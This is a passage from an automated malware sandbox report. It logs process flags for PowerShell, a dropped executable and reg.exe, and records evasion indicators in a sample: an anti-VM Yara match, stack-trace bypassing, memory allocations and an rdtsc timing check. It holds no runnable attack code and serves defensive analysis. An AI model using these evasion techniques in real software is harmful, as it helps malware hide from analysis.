            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: jlsvOH1c8bSRKqM.exe PID: 7268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AZJifQrhDpEQCA.exe PID: 7752, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: 9D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: C30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: A160000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: B160000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: B3E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: C3E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: CA70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: DA70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: EA70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 47F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 7450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 8450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 85F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 95F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 9930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMemory allocated: 7450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E096E rdtsc 8_2_017E096E
